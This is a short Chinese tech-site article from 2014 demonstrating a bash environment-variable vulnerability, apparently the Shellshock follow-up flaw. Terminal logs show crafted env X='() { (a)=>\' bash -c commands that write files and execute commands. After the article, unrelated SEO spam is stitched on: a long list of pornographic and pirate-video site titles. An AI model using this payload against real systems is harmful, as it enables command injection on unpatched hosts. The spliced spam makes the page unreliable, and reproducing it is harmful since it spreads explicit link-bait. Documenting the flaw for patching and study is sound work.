《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 亚洲国产精品成人久久| 国产三级久久精品三级| 99热免费精品| 影音先锋男人站| 久久久无码精品亚洲日韩按摩| 樱花草www日本在线观看| 亚洲第一区se| 男人和女人在床做黄的网站| 啊灬用力灬啊灬啊灬啊| 野外做受又硬又粗又大视频| 国产换爱交换乱理伦片| 中国精品白嫩bbwbbw| 在线二区人妖系列| www.日日爱| 思思久久99热只有频精品66| 四虎永久在线精品国产免费 | 彩虹男gary网站| 中文无码人妻有码人妻中文字幕| 日韩人妻无码一区二区三区久久99 | 亚洲欧美日韩一级特黄在线| 狠狠色噜噜狠狠狠狠av| 免费看一级毛片| 精品国产三级a| 啊灬啊灬别停啊灬用力啊免费| 视频一区视频二区在线观看 | 四虎永久免费观看| 被cao的合不拢腿的皇后| 国产午夜影视大全免费观看 | 久久亚洲AV成人无码| 日本高清色本免费现在观看| 久久这里只有精品18| 最近最新在线中文字幕| 亚洲中文字幕久久精品无码2021 | 国产一级做美女做受视频| 蜜桃麻豆www久久国产精品| 国产偷久久久精品专区| 韩国激情3小时三级在线观看| 国产在线视频www片| 高清一级毛片免免费看| 国产国语高清在线视频二区| 高清男的插曲女的欢迎你老狼|